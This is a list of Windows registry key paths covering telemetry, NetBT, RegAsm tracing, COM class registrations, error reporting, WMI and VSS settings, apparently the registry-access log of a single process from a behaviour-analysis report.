HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\NodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpNodeType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\ScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpScopeId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableProxy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableDns
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\EnableConsoleTracing
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\RegAsm_RASAPI32
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegAsm_RASAPI32\FileDirectory
HKEY_CURRENT_USER
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\RegAsm.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\1DF4D951
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.JScript__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration.Install__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient
HKEY_CURRENT_USER\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_CURRENT_USER\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass
HKEY_CURRENT_USER\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting
HKEY_CURRENT_USER\SOFTWARE\Microsoft\PCHealth\ErrorReporting
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\ForceQueueMode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\ShowUI
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\DoReport
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\AllOrNone
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting\ExclusionList
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting\ExclusionList
HKEY_CURRENT_USER\SOFTWARE\Microsoft\PCHealth\ErrorReporting\ExclusionList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting\ExclusionList
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting\InclusionList
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting\InclusionList
HKEY_CURRENT_USER\SOFTWARE\Microsoft\PCHealth\ErrorReporting\InclusionList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting\InclusionList
HKEY_CLASSES_ROOT\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32\(Default)
HKEY_CLASSES_ROOT\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server\(Default)
HKEY_USERS\S-1-5-20_Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LaunchPermission
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Elevation
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\Tracing\WMI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Safeboot\Option
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\VssAccessControl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Settings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\WMI Writer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax
HKEY_LOCAL_MACHINE\Software\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult
